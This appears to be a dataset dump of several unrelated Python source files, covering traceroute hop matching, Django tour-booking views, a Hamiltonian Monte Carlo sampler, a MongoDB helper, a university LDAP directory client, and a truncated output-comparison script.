intersects_per_rr_hop[rr_hop[0]] = previous_tr_hop, next_hop_rr_alias\n else:\n # Look if we found a smaller subpath\n current_previous_tr_hop, current_next_tr_hop = intersects_per_rr_hop[rr_hop[0]]\n if previous_tr_hop > current_previous_tr_hop:\n current_previous_tr_hop = previous_tr_hop\n if next_hop_rr_alias < current_next_tr_hop:\n current_next_tr_hop = next_hop_rr_alias\n intersects_per_rr_hop[rr_hop[0]] = current_previous_tr_hop, current_next_tr_hop\n\n # Use the constraints found with the successors, predecessors of the rr_hop to see\n # if we can do better\n intersects_per_rr_hop_with_pred_succ = {}\n for rr_hop in intersects_per_rr_hop:\n previous_tr_hop, next_tr_hop = intersects_per_rr_hop[rr_hop]\n if rr_hop in successors_per_hop:\n succ_tr_hop = [intersects_per_rr_hop[successor][1] for successor in successors_per_hop[rr_hop] if\n successor in intersects_per_rr_hop]\n if len(succ_tr_hop) > 0:\n min_succ_tr_hop = min(succ_tr_hop)\n if min_succ_tr_hop < next_tr_hop:\n next_tr_hop = min_succ_tr_hop\n if rr_hop in predecessors_per_hop:\n pred_tr_hop = [intersects_per_rr_hop[predecessor][0] for predecessor in predecessors_per_hop[rr_hop] if\n predecessor in intersects_per_rr_hop]\n if len(pred_tr_hop) > 0:\n max_pred_tr_hop = max(pred_tr_hop)\n if max_pred_tr_hop > previous_tr_hop:\n previous_tr_hop = max_pred_tr_hop\n intersects_per_rr_hop_with_pred_succ[rr_hop] = previous_tr_hop, next_tr_hop\n\n # print(tr_id)\n # Now insert the subpaths intersection into the database\n\n for rr_hop, (tr_hop_start_index, tr_hop_end_index) in intersects_per_rr_hop_with_pred_succ.items():\n tr_ttl_start = tr_hops[tr_hop_start_index][1]\n tr_ttl_end = tr_hops[tr_hop_end_index][1]\n rr_intersection_rows_to_insert.append((tr_id, rr_hop, tr_ttl_start, tr_ttl_end))\n\n query = (\n f\" INSERT INTO atlas_rr_intersection (traceroute_id, rr_hop, tr_ttl_start, tr_ttl_end) \"\n f\" VALUES (%s, %s, %s, %s) \"\n )\n cursor.executemany(query, rr_intersection_rows_to_insert)\n\ndef match_rr_tr_hops_traceroute_ids(traceroute_ids, with_p2p):\n connection = get_connection(\"traceroute_atlas\", autocommit=0)\n traceroute_ids = list(traceroute_ids)\n for i in range(0, len(traceroute_ids), 1000):\n max_index = i + 1000\n if i + 1000 > len(traceroute_ids):\n max_index = len(traceroute_ids)\n in_clause= f\"\".join([f\",{traceroute_id}\" for traceroute_id in traceroute_ids[i:max_index]])[1:]\n\n query = (\n f\" SELECT traceroute_id, ping_id, tr_hop, rr_hop, rr_hop_index \"\n f\" FROM atlas_rr_pings arrp \"\n f\" INNER JOIN atlas_traceroutes at ON at.id = arrp.traceroute_id \"\n f\" WHERE at.id in ({in_clause}) \"\n f\" ORDER BY traceroute_id, ping_id, rr_hop_index \"\n )\n cursor = connection.cursor()\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n if len(rows) == 0:\n return\n # print(f\"Fetched {len(rows)} rows\")\n i = 0\n rr_hops_per_tr_id = {}\n ips_for_alias_set = set()\n for row in rows:\n i += 1\n tr_id, ping_id, tr_hop, rr_hop, rr_hop_index = row\n if ipaddress.ip_address(rr_hop).is_private:\n continue\n ips_for_alias_set.add(rr_hop)\n # rr hops are ordered\n rr_hops_per_tr_id.setdefault(tr_id, {}).setdefault(tr_hop, {}).setdefault(ping_id, []).append(\n (rr_hop, rr_hop_index))\n\n query = (\n f\" SELECT src, dest, trace_id, ath.hop, ath.ttl\"\n f\" FROM atlas_traceroute_hops ath\"\n f\" INNER JOIN atlas_traceroutes at ON at.id = ath.trace_id \"\n f\" WHERE at.id in ({in_clause}) \"\n f\" ORDER BY trace_id, ttl\"\n )\n\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n src_dst_per_tr_id = {}\n tr_hops_per_tr_id = {}\n for row in rows:\n src, dest, trace_id, hop, ttl = row\n tr_hops_per_tr_id.setdefault(trace_id, []).append((hop, ttl))\n src_dst_per_tr_id[trace_id] = (src, dest)\n\n match_rr_tr_hops(cursor, ips_for_alias_set, rr_hops_per_tr_id, tr_hops_per_tr_id, with_p2p)\n\n connection.commit()\n cursor.close()\n connection.close()\n\ndef compute_tr_hops_by_tr_id(cursor, src, label):\n query = (\n f\" SELECT src, dest, trace_id, ath.hop, ath.ttl\"\n f\" FROM atlas_traceroute_hops ath\"\n f\" INNER JOIN atlas_traceroutes at ON at.id = ath.trace_id \"\n f\" WHERE at.dest={src} \"\n )\n if label is not None:\n query += f\" AND at.platform='{label}' \"\n query += (\n f\" ORDER BY trace_id, ttl\"\n )\n\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n src_dst_per_tr_id = {}\n tr_hops_per_tr_id = {}\n for row in rows:\n src, dest, trace_id, hop, ttl = row\n tr_hops_per_tr_id.setdefault(trace_id, []).append((hop, ttl))\n src_dst_per_tr_id[trace_id] = (src, dest)\n\n return tr_hops_per_tr_id, src_dst_per_tr_id\n\ndef compute_rr_hops_by_tr_id(cursor, src, label):\n query = (\n f\" SELECT traceroute_id, ping_id, tr_hop, rr_hop, rr_hop_index \"\n f\" FROM atlas_rr_pings arrp \"\n f\" INNER JOIN atlas_traceroutes at ON at.id = arrp.traceroute_id \"\n f\" WHERE at.dest={src} \"\n )\n if label is not None:\n query += f\" AND at.platform='{label}' \"\n query += (\n f\" ORDER BY traceroute_id, ping_id, rr_hop_index \"\n\n )\n\n cursor.execute(query, )\n # rows = cursor.fetchmany(batch_size)\n rows = cursor.fetchall()\n if len(rows) == 0:\n return\n # print(f\"Fetched {len(rows)} rows\")\n i = 0\n rr_hops_per_tr_id = {}\n ips_for_alias_set = set()\n for row in rows:\n i += 1\n tr_id, ping_id, tr_hop, rr_hop, rr_hop_index = row\n if ipaddress.ip_address(rr_hop).is_private:\n continue\n ips_for_alias_set.add(rr_hop)\n # rr hops are ordered\n rr_hops_per_tr_id.setdefault(tr_id, {}).setdefault(tr_hop, {}).setdefault(ping_id, []).append(\n (rr_hop, rr_hop_index))\n return rr_hops_per_tr_id, ips_for_alias_set\n\ndef match_rr_tr_hops_all(with_p2p, label):\n vps = get_vps()\n\n for src in vps:\n print(src)\n connection = get_connection(\"traceroute_atlas\", autocommit=0)\n cursor = connection.cursor()\n\n rr_hops_per_tr_id_ips_for_alias_set = compute_rr_hops_by_tr_id(cursor, src, label)\n if rr_hops_per_tr_id_ips_for_alias_set is not None:\n rr_hops_per_tr_id, ips_for_alias_set = rr_hops_per_tr_id_ips_for_alias_set\n tr_hops_per_tr_id, src_dst_per_tr_id = compute_tr_hops_by_tr_id(cursor, src, label)\n match_rr_tr_hops(cursor, ips_for_alias_set, rr_hops_per_tr_id, tr_hops_per_tr_id, with_p2p)\n\n connection.commit()\n connection.close()\n\n\nif __name__ == \"__main__\":\n\n '''\n Run the intersection algorithm to find with RR hop corresponds to which TrHop in traceroutes. \n '''\n\n ######################################################################\n ## Parameters\n ######################################################################\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--mode\", help=\"mode, either all, label or selection\", type=str)\n parser.add_argument(\"-l\", \"--label\", help=\"label of the traceroutes in the database\", type=str)\n parser.add_argument(\"--id\", help=\"traceroute id\", type=int)\n parser.add_argument(\"--ids-file\", help=\"file containing traceroute ids\", type=str)\n\n\n args = parser.parse_args()\n\n if not args.mode or args.mode not in [\"all\", \"selection\", \"label\"]:\n print(parser.error(\"mode option is mandatory, values are either all or single\"))\n exit(1)\n\n if args.mode == \"all\":\n match_rr_tr_hops_all(with_p2p=True, label=args.label)\n elif args.mode == \"selection\":\n traceroute_ids = set()\n with open(args.ids_file) as f:\n for line in f:\n traceroute_ids.add(int(line.strip(\"\\n\")))\n\n match_rr_tr_hops_traceroute_ids(traceroute_ids, with_p2p=True)\n elif args.mode == \"label\":\n match_rr_tr_hops_all(with_p2p=True, label=args.label)\n","sub_path":"rankingservice/atlas/record_route.py","file_name":"record_route.py","file_ext":"py","file_size_in_byte":15606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"187451221","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Tour, Order\nfrom django.contrib.auth import get_user\nfrom .forms import AddOrder, UserRegistrationForm\n\n\n\ndef near_tours():\n near_tours = Tour.objects.all().order_by('start_date')[:3]\n return near_tours\n\ndef home(request):\n return render(request, 'home.html',{'near_tours':near_tours()})\n\ndef tour_list(request, tour_type):\n tours = []\n unique_tours = set(Tour.objects.filter(tour_type=tour_type).values_list('title', flat=True))\n for title in unique_tours:\n tours += [Tour.objects.filter(title=title)[0]]\n return render(request, 'tour_list.html', {'tours': tours,'near_tours':near_tours()})\n\n\ndef tour_detail(request, tour_id, tour_type):\n tour = get_object_or_404(Tour, id=tour_id)\n tours = Tour.objects.filter(title=tour.title).order_by('start_date')\n if request.method == \"POST\":\n new_tours = []\n for tour in tours:\n tour.form = AddOrder(request.POST,prefix=tour.id)\n\n if str(tour.form['person_numbers']).find('value') !=-1 and str(tour.form['person_numbers']).find('value') !=-1:\n\n if tour.form.is_valid():\n order = Order()\n order.person_numbers = tour.form.cleaned_data['person_numbers']\n order.contact_phone = tour.form.cleaned_data['contact_phone']\n order.user = get_user(request)\n tour = get_object_or_404(Tour, start_date=request.POST['start_date'])\n order.tour = tour\n if int(order.person_numbers) <= tour.vacant_spot:\n tour.vacant_spot = tour.vacant_spot - int(order.person_numbers)\n tour.save()\n order.save()\n return render(request, 'tour_confirm.html', {'tour': order.tour})\n else:\n tour.message = 'Недостаточно свободных мест'\n tour.form = AddOrder(request.POST, prefix=tour.id)\n new_tours.append(tour)\n else:\n tour.form = AddOrder(request.POST, prefix=tour.id)\n new_tours.append(tour)\n else:\n tour.message = ''\n tour.form = AddOrder(prefix=tour.id)\n new_tours.append(tour)\n return render(request, 'tour_detail.html', {'tour': tour, 'tours': new_tours, 'near_tours': near_tours(),'anchor': 'comment'})\n else:\n for tour in tours:\n tour.form = AddOrder(prefix=tour.id)\n\n return render(request, 'tour_detail.html', {'tour':tour, 'tours':tours,'near_tours':near_tours()})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(request.POST)\n if user_form.is_valid():\n new_user = user_form.save(commit=False)\n new_user.set_password(user_form.cleaned_data['password'])\n new_user.save()\n return render(request, 'register_done.html', {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request, 'register.html', {'user_form': user_form})\n\ndef orders(request):\n orders = Order.objects.all().order_by('-id')\n return render(request, 'order_list.html', {'orders': orders})\n\n","sub_path":"Tasks/Olga Ivanova/Project/Vtur/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"85006580","text":"import numpy as np\nfrom collections import deque\nfrom .hmc import HamiltonianUpdate, HamiltonState\nfrom ..densities.gaussian import Gaussian\nfrom ..sampling import Sample\nfrom ..util import is_power_of_ten\n\n\ndef integrator(q, pot_gradient, v, du, lim_lower, lim_upper, stepsize, nsteps):\n # make a half step for velocity\n v = v - stepsize/2 * du\n \n # alternate full steps for position and momentum\n for l in range(nsteps):\n # make a full step for position\n q = q + stepsize * v\n\n # handle constraints by wall hitting\n while(True):\n l_c = q < lim_lower\n u_c = q > lim_upper\n\n if l_c.any():\n q[l_c] = 2*lim_lower[l_c[0]] - q[l_c]\n v[l_c] = -v[l_c]\n elif u_c.any():\n q[u_c] = 2*lim_upper[u_c[0]] - q[u_c]\n v[u_c] = -v[u_c]\n else:\n break\n\n # make full step for velocity\n du = pot_gradient(q)[0]\n if np.isinf(du).any():\n return None, None, None \n\n if l != nsteps-1:\n v = v - stepsize * du\n\n # make last half step for velocity\n v = v - stepsize/2 * du\n \n return q, v, du\n\n\nclass WallHMC(HamiltonianUpdate):\n \"\"\"\n Wall HMC for box type constraints\n \"\"\"\n\n def __init__(self, target_density, stepsize_min, stepsize_max,\n nsteps_min, nsteps_max, lim_lower=None, lim_upper=None,\n is_adaptive=False):\n p_dist = Gaussian(target_density.ndim)\n super().__init__(target_density, p_dist, None, None, is_adaptive=is_adaptive)\n self.target_density = target_density\n self.p_dist = p_dist\n\n # default limits: unit hypercube\n if lim_lower is None:\n lim_lower = np.zeros(self.target_density.ndim)\n if lim_upper is None:\n lim_upper = np.ones(self.target_density.ndim)\n\n self.stepsize_min = stepsize_min\n self.stepsize_max = stepsize_max\n self.nsteps_min = nsteps_min\n self.nsteps_max = nsteps_max\n self.lim_lower = lim_lower\n self.lim_upper = lim_upper\n\n def init_state(self, state):\n if not isinstance(state, HamiltonState):\n state = HamiltonState(state)\n\n return super().init_state(state)\n \n def proposal(self, current):\n \"\"\"Propose a new state.\"\"\"\n # initialization\n #try:\n # q = current\n # du = current.pot_gradient\n #except AttributeError:\n # current = self.init_state(current)\n # q = current\n # du = current.pot_gradient\n q = current\n du = self.target_density.pot_gradient(q)\n\n # sample velocity\n v = current.momentum = self.p_dist.proposal()\n\n # sample integrator parameters\n nsteps = np.random.randint(self.nsteps_min, self.nsteps_max + 1)\n stepsize = (np.random.rand() * (self.stepsize_max - self.stepsize_min) +\n self.stepsize_min)\n \n # integrate\n q, v, du = integrator(q, self.target_density.pot_gradient, v, du,\n self.lim_lower, self.lim_upper, stepsize, nsteps)\n\n if q is None:\n return None\n\n #pot = self.target_density.pot(q)\n #return HamiltonState(q, momentum=v, pot_gradient=du, pot=pot)\n return HamiltonState(q, momentum=v)\n\n def accept(self, state, candidate):\n \"\"\"Return the logarithm of the acceptance probability.\"\"\"\n try:\n U_current = self.target_density.pot(state)\n #if np.isinf(U_current): # shouldn't be necessary\n # return 0\n H_current = U_current + .5*state.momentum.dot(state.momentum)\n U_proposal = self.target_density.pot(candidate)\n if np.isinf(U_proposal):\n return -np.inf\n H_proposal = U_proposal + .5*candidate.momentum[0].dot(candidate.momentum[0])\n log_prob = -H_proposal + H_current\n if np.isinf(log_prob): # shouldn't be necessary\n return -np.inf\n return log_prob\n except RuntimeWarning:\n return -np.inf\n\n def next_state(self, state, iteration):\n candidate = self.proposal(state)\n if candidate is None:\n return state\n\n try:\n log_accept = self.accept(state, candidate)\n except (TypeError, AttributeError):\n # in situations like mixing/composite updates, previous update\n # may not have set necessary attributes (such as pdf)\n state = self.init_state(state)\n log_accept = self.accept(state, candidate)\n\n #if not np.isinf(log_accept) and np.log(np.random.rand()) < min(0, log_accept):\n if np.log(np.random.rand()) < log_accept:\n next_state = candidate\n else:\n next_state = state\n\n if self.is_adaptive:\n self.adapt(iteration, state, next_state, log_accept)\n\n return next_state\n\n #def sample(self, sample_size, initial, out_mask=None, n_batches=20):\n # \"\"\"\n # Return a weighted sample. To get an unweighted sample it has \n # to be resampled using np.random.choice()\n # \"\"\"\n\n # # initialize sampling\n # state = self.init_state(np.atleast_1d(initial))\n # if len(state) != self.target_density.ndim:\n # raise ValueError('initial must have dimension ' + str(self.target_density.ndim))\n # self.init_adapt(state) # initial adaptation\n\n # batch_length = int(sample_size/n_batches)\n\n # tags = dict()\n # tagged = dict()\n\n # chain = np.empty((sample_size, self.target_density.ndim))\n # chain[0] = state\n\n # batch_accept = deque(maxlen=batch_length)\n # current_seq = 1 # current sequence length\n # max_seq = 1 # maximal sequence length\n # skip = 1\n # for i in range(1, sample_size):\n # state = self.next_state(state, i)\n # if not np.array_equal(state, chain[i - 1]):\n # batch_accept.append(1)\n # if current_seq > max_seq:\n # max_seq = current_seq\n # current_seq = 1\n # else:\n # batch_accept.append(0)\n # current_seq += 1\n\n # chain[i] = state\n # try:\n # try:\n # tags[state.tag_parser].append(state.tag)\n # tagged[state.tag_parser].append(i)\n # except KeyError:\n # tags[state.tag_parser] = []\n # tagged[state.tag_parser] = []\n # except AttributeError:\n # pass\n\n # if i % skip == 0:\n # if i >= batch_length:\n # accept_rate = sum(batch_accept)/batch_length\n # else:\n # accept_rate = sum(batch_accept)/i\n # if i == 1:\n # print(\"Event 1\\t(batch acceptance rate: %f)\" % (accept_rate))\n # else:\n # print(\"Event %i\\t(batch acceptance rate: %f)\\tmax sequence length: %i\" % (i, accept_rate, max(current_seq, max_seq)))\n # if is_power_of_ten(i):\n # skip *= 10\n\n # if out_mask is not None:\n # chain = chain[:, out_mask]\n\n # for parser in tagged:\n # chain[tagged[parser]] = parser(chain[tagged[parser]], tags[parser])\n\n # sample = Sample(data=chain, target=self.target_density)\n # return sample\n","sub_path":"src/hepmc/core/hamiltonian/wall_hmc.py","file_name":"wall_hmc.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"275128142","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4\n\nfrom django.conf import settings\nimport os, json, sys\nimport datetime\nfrom bson.code import Code\nfrom bson.objectid import ObjectId\nfrom bson import json_util\nfrom pymongo import MongoClient, DESCENDING\nfrom collections import OrderedDict\n\n\n\ndef to_json(results_dict):\n return json.dumps(results_dict, indent = 4, default=json_util.default)\n \n \ndef update_mongo_pjson(document, database_name=\"nppes\", collection_name=\"pjson\"):\n \"\"\"Update a Provider JSON resource. The resource must exist in this implementation.\n \"\"\"\n l=[]\n response_dict=OrderedDict()\n invalid = False\n existing_document = None\n try:\n\n mc = MongoClient(host='127.0.0.1', port=27017, document_class=OrderedDict)\n db = mc[database_name]\n collection = db[collection_name]\n\n myobject=collection.find_one({'number':document['number']})\n response_dict['number'] = document['number']\n if not myobject:\n response_dict['code']=404\n response_dict['errors']=[\"The record cannot be updated because it is not found in the database.\",]\n \n else:\n document['_id'] = myobject['_id']\n myobjectid=collection.save(document)\n response_dict['code']=200\n except:\n print(\"Error reading from Mongo\")\n print(str(sys.exc_info()))\n response_dict['code'] = 500\n response_dict['errors']=[ str(sys.exc_info()), ]\n\n \n return response_dict\n\n\n","sub_path":"apps/nppes_handler/mongoutils.py","file_name":"mongoutils.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"184900302","text":"\"\"\"\nAccess and query The University's TED database.\n\nOriginally authored by Gary Wilson Jr. while in the ECE Department, and since\nadapted to make use of the python-simpleldap library that was factored out of\nthe original work.\n\"\"\"\n\nfrom getpass import getpass\nfrom ldap.filter import filter_format\nfrom simpleldap import Connection, LDAPItem\n\n\nclass TEDLDAPItem(LDAPItem):\n \"\"\"\n An extension of LDAPItem with methods specific to TED.\n \"\"\"\n\n def is_active(self):\n \"\"\"\n Return True if object has 'Active' inetUserStatus.\n Indicates whether the person is permitted to logon using their UT EID.\n \"\"\"\n return self.first('inetUserStatus') == 'Active'\n\n def has_affiliation(self, value):\n \"\"\"\n Return True if object has the passed value in the eduPersonAffiliation\n attribute.\n \"\"\"\n return value in self['eduPersonAffiliation']\n\n def has_entitlement(self, code):\n \"\"\"\n Return True if object has the given entitlement code.\n \"\"\"\n return code in self['utexasEduPersonEntitlementCode']\n\n def in_depts(self, depts, attr='utexasEduPersonOrgUnitName'):\n \"\"\"\n Return True if object is in any of the given departments, using the\n utexasEduPersonOrgUnitName attribute to determine membership.\n\n If depts is empty, then return True.\n\n attr is the attribute to use to determine department membership. The\n default is 'utexasEduPersonOrgUnitName', but when looking up a student\n you'll likely want to use 'utexasEduPersonMajorDept'.\n \"\"\"\n if not depts:\n return True\n for dept in depts:\n if dept in self[attr]:\n return True\n return False\n\n def is_faculty(self, depts=[]):\n \"\"\"\n Return True if object has 'faculty' in the eduPersonAffiliation\n attribute. Accepts an optional list of department names passed as\n depts, that will also check that the object has one of those\n department names in the utexasEduPersonOrgUnitName attribute.\n \"\"\"\n return self.has_affiliation('faculty') and self.in_depts(depts)\n\n def is_staff(self, depts=[]):\n \"\"\"\n Return True if object has 'staff' in the eduPersonAffiliation\n attribute. Accepts an optional list of department names passed as\n depts, that will also check that the object has one of those\n department names in the utexasEduPersonOrgUnitName attribute.\n \"\"\"\n return self.has_affiliation('staff') and self.in_depts(depts)\n\n def is_student(self, depts=[]):\n \"\"\"\n Return True if object has 'student' in the eduPersonAffiliation\n attribute. Accepts an optional list of department names passed as\n depts, that if passed will also check that the object is a major of\n one of those departments.\n \"\"\"\n return self.has_affiliation('student') \\\n and self.in_depts(depts, attr='utexasEduPersonMajorDept')\n\n def is_member(self):\n \"\"\"\n Return True if object has 'member' in the eduPersonAffiliation\n attribute.\n \"\"\"\n return self.has_affiliation('member')\n\n def is_affiliate(self):\n \"\"\"\n Return True if object has 'affiliate' in the eduPersonAffiliation\n attribute.\n \"\"\"\n return self.has_affiliation('affiliate')\n\n def has_signature_authority(self):\n \"\"\"\n Return True if object's EID has electronic signature authority\n (SIG entitlement).\n \"\"\"\n return self.has_entitlement(\"SIG\")\n\n def is_developer(self):\n \"\"\"\n Return True if the object has the developer (DEV) entitlement.\n \"\"\"\n return self.has_entitlement(\"DEV\")\n\n def is_restricted(self):\n \"\"\"\n Return True if the person's data is restricted\n \"\"\"\n restrictions = [\n self.get('utexasEduPersonAttrRestrict', None),\n self.get('utexasEduPersonRecordRestrict', None),\n ]\n return restrictions != [None,None]\n\n\nclass TEDConnection(Connection):\n \"\"\"\n A connection to TED, the uTexas Enterprise Directory.\n \"\"\"\n\n # Default attributes to return for searches.\n attributes = [\n 'cn',\n 'givenName',\n 'sn',\n 'inetUserStatus',\n 'utexasEduPersonEid',\n 'utexasEduPersonUin',\n 'utexasEduPersonIsoNumber',\n 'utexasEduPersonOrgUnitName',\n 'utexasEduPersonPubAffiliation',\n 'eduPersonAffiliation',\n 'utexasEduPersonPrimaryTitle',\n 'utexasEduPersonHighestDegree',\n 'utexasEduPersonCourseNumber',\n 'utexasEduPersonOrgUnitName',\n 'utexasEduPersonMajorDept',\n 'mail',\n 'utexasEduPersonEntitlementCode',\n 'utexasEduPersonAttrRestrict',\n 'utexasEduPersonRecordRestrict',\n ]\n\n result_item_class = TEDLDAPItem\n\n def __init__(self, dn=None, eid=None, password='', service=True,\n hostname=None, **kwargs):\n \"\"\"\n A connection to the TED server.\n\n Typically, ``eid`` and ``password`` are given, and represent the user\n to bind as. By default, ``eid`` is considered to be a Service EID.\n To use a person EID, set ``service`` to ``False``. Alternatively, you\n may pass a fully-qualified distinguished name as ``dn``, which,\n if given, will be the exact dn string used to bind. If you pass no\n dn or password, both default to empty string (anonymous bind).\n\n If host is not given, it defaults to 'entdir.utexas.edu'.\n If encryption is not given, it defaults to 'ssl'.\n \"\"\"\n dn = self._get_dn(dn, eid, service)\n if 'encryption' not in kwargs:\n kwargs['encryption'] = 'ssl'\n super(TEDConnection, self).__init__(hostname, dn=dn, password=password,\n **kwargs)\n\n def _get_dn(self, dn=None, eid=None, service=None):\n \"\"\"\n Helper function to return a dn based the passed values. If neither dn\n nor eid is given, then return '' (anonymous).\n \"\"\"\n if dn:\n return dn\n if eid:\n if service:\n return \"uid=%s,ou=services,dc=entdir,dc=utexas,dc=edu\" % eid\n else:\n return \"uid=%s,ou=people,dc=entdir,dc=utexas,dc=edu\" % eid\n # Anonymous.\n return ''\n\n def _get_by_attr(self, attr, value, **kwargs):\n filter_str = filter_format(\"(%s=%s)\", [attr, value])\n return self.get(filter_str, **kwargs)\n\n def get_by_eid(self, eid, *args, **kwargs):\n return self._get_by_attr(\"utexasEduPersonEid\", eid, *args, **kwargs)\n\n def get_by_uin(self, uin, *args, **kwargs):\n return self._get_by_attr(\"utexasEduPersonUin\", uin, *args, **kwargs)\n\n def get_by_iso(self, iso, *args, **kwargs):\n return self._get_by_attr(\"utexasEduPersonIsoNumber\", iso,\n *args, **kwargs)\n\n def search(self, filter, **kwargs):\n if 'attrs' not in kwargs or kwargs['attrs'] == None:\n kwargs['attrs'] = self.attributes\n else:\n kwargs['attrs'].extend([\n attr for attr in self.attributes if attr not in kwargs['attrs']\n ])\n return super(TEDConnection, self).search(filter, **kwargs)\n\n def _search_by_attr(self, attr, value, **kwargs):\n filter_str = filter_format(\"(%s=%s)\", [attr, value])\n return self.search(filter_str, **kwargs)\n\n def search_by_eid(self, eid, *args, **kwargs):\n return self._search_by_attr(\"utexasEduPersonEid\", eid, *args, **kwargs)\n\n def search_by_uin(self, uin, *args, **kwargs):\n return self._search_by_attr(\"utexasEduPersonUin\", uin, *args, **kwargs)\n\n def search_by_iso(self, iso, *args, **kwargs):\n return self._search_by_attr(\"utexasEduPersonIsoNumber\", iso,\n *args, **kwargs)\n\n def search_by_name(self, fullname, *args, **kwargs):\n \"\"\"\n Search for fullname in TED cn field.\n\n ``fullname`` is handled like so:\n\n * If only a single name is given, e.g. \"last\", the query finds objects\n with an exact match of the cn or objects with a matching last name\n (cn \" last\").\n * If two names are given, e.g. \"first last\", the query finds objects\n with a matching first name (cn beginning with \"first \") and last\n name.\n * If three or more names are given, e.g. \"first middle1 middle2 last\",\n the query finds objects with a matching first and last name that also\n contain the middle names (cn containing \" middle1 middle2 \").\n\n Note, querying for common names will likely result in the server\n returning a size limit exceeded error; thus, when at all possible, you\n should really only be querying by EID, UIN, or ISO.\n \"\"\"\n names = fullname.split()\n if len(names) < 1:\n filter_str = '(cn=)'\n elif len(names) == 1:\n filter_str = filter_format(\"(|(cn=%s)(cn=* %s))\", [names[0]] * 2)\n elif len(names) == 2:\n filter_str = filter_format(\"(&(cn=%s *)(cn=* %s))\", names)\n else:\n middle_names = \" \".join(names[1:-1])\n filter_str = filter_format(\"(&(cn=%s *)(cn=* %s *)(cn=* %s))\",\n [names[0], middle_names, names[-1]])\n return self.search(filter_str, *args, **kwargs)\n\n\nclass InteractiveTEDConnection(TEDConnection):\n \"\"\"Prompts for EID and password.\"\"\"\n\n def __init__(self, **kwargs):\n if 'eid' not in kwargs:\n kwargs['eid'] = raw_input('Enter EID: ')\n if 'password' not in kwargs:\n kwargs['password'] = getpass(\"%s's password: \" % kwargs['eid'])\n super(InteractiveTEDConnection, self).__init__(**kwargs)\n","sub_path":"ted/ted.py","file_name":"ted.py","file_ext":"py","file_size_in_byte":9905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"184861213","text":"import os\nimport random\n\nimport pathlib\nimport time\nimport datetime\nimport timeit\n\n\nfopInput='/home/hung/git/COMS527_data/PrutorCodes/'\nfopTempAnalysis='/home/hung/git/COMS527_data/TempAnalysis/'\n# fopSerialTime='/home/hung/git/COMS527_data/TimeAnalysis_all/'\nfopOutputAnalysis='/home/hung/git/COMS527_data/OutputAnalysis_all3/'\n# fopParallelTime='/home/hung/git/COMS527_data/Aug1-TimeAnalysis_all/'\nfopParallelOutputAnalysis='/home/hung/git/COMS527_data/Aug1-OutputAnalysis_all3/'\n\ndef intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\ndef extractPrintOutputAndTime(strContent):\n arrContent=strContent.split('\\n')\n strPrint=''\n strTime=''\n if(len(arrContent)>=2):\n strTime=arrContent[len(arrContent)-1]\n l = list(arrContent)\n l.pop()\n strPrint='\\n'.join(l)\n return strPrint,strTime\n\nlistSerialTime=[]\nlistSerialAnalysis=[]\nlistParallelTime=[]\nlistParallelAnalysis=[]\ndictSerialTime={}\n# dictSerialAnalysis={}\ndictParallelTime={}\n# dictParallelAnalysis={}\ndictOutputSame={}\n\ncurrentPattern = \"*.txt\"\nlistFiles=[]\nlistNameIntersection=[]\ncurrentDirectory = pathlib.Path(fopParallelOutputAnalysis)\nfor currentFile in currentDirectory.glob(currentPattern):\n strFilePath=str(currentFile)\n listFiles.append(strFilePath)\n# print('Parallel size {}'.format(len(listFiles)))\nfor i in range(0,len(listFiles)):\n strFilePath=listFiles[i]\n\n isTimeSerialOK=False\n isOutputSerialOK = False\n isTimeParallelOK = False\n isOutputParallelOK = False\n\n fileName=os.path.basename(strFilePath).replace('.txt','').replace('output-','')\n strContentParallel=''\n strContentTimeParallel=''\n strContentOutputParallel=''\n\n try:\n f = open(strFilePath, 'r', encoding=\"latin-1\")\n strContentParallel = f.read().strip()\n strContentOutputParallel,strContentTimeParallel=extractPrintOutputAndTime(strContentParallel)\n f.close()\n except Exception as e:\n strContentParallel = ''\n if (strContentTimeParallel.startswith('Time elapsed in ms: ')):\n # listParallelTime.append(fileName)\n isTimeParallelOK=True\n strTime=strContentTimeParallel.replace('Time elapsed in ms: ','').strip()\n num = float(strTime)\n dictParallelTime[fileName] = num\n if ((strContentOutputParallel != '') and (not 'error' in strContentOutputParallel)):\n isOutputParallelOK=True\n\n\n fpOutputSerial = fopOutputAnalysis + 'output-' + fileName + '.txt'\n strContentSerial = ''\n strContentTimeSerial=''\n strContentOutputSerial=''\n try:\n f = open(fpOutputSerial, 'r', encoding=\"latin-1\")\n strContentSerial = f.read().strip()\n f.close()\n\n except Exception as e:\n strContentSerial=''\n strContentOutputSerial,strContentTimeSerial=extractPrintOutputAndTime(strContentSerial)\n if (strContentTimeSerial.startswith('Time elapsed in ms: ')):\n # listSerialTime.append(fileName)\n isTimeSerialOK = True\n strTime = strContentTimeSerial.replace('Time elapsed in ms: ', '').strip()\n num = float(strTime)\n dictSerialTime[fileName] = num\n\n if ((strContentOutputSerial != '') and (not 'error' in strContentOutputSerial)):\n isOutputSerialOK=True\n listSerialAnalysis.append(fileName)\n # dictSerialAnalysis[fileName]=strContentOutputSerial\n\n # print('{} {} {} {}'.format(isTimeParallelOK,isOutputParallelOK,isTimeSerialOK,isOutputSerialOK))\n if(isTimeParallelOK and isOutputParallelOK and isTimeSerialOK and isOutputSerialOK):\n listNameIntersection.append(fileName)\n\n if strContentOutputSerial == strContentOutputParallel:\n 